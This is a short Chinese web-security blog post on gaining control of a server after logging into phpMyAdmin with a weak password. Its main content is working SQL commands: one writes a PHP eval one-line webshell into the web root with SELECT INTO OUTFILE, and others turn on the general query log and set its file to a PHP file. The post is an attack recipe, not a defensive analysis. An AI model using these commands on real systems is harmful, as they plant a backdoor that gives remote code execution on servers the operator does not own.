【Web安全】拿到phpMyAdmin如何获取权限

文章目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

mysql 复制代码
select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

如果执行失败show variables like "%secure%"; 查看配置

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

复制代码
set global general_log_file="网站绝对路径/文件名";
mysql 复制代码
SELECT "<?php @eval($_POST[1])?>"

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

相关推荐
取个名字太难了~1 小时前
越用越便宜,越用越强大:影像 SDK 的边际成本递减与网络效应实践
android·数码相机·美颜·相机连接·demu
xixixi777773 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_466525293 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz567893 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_954708314 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
AFinalStone5 小时前
Android 7系统网络(四)Native层(下)—netd Controller详解
android·网络
冰茶丿5 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
爱笑鱼5 小时前
Handler(一):post 之后,Runnable 到底在哪个线程执行?
android
木木子226 小时前
[特殊字符] 音乐播放器——状态驱动的多媒体控制
android·开发语言·华为·php·harmonyos
雨白6 小时前
C 语言基础:结构体、联合体与枚举
android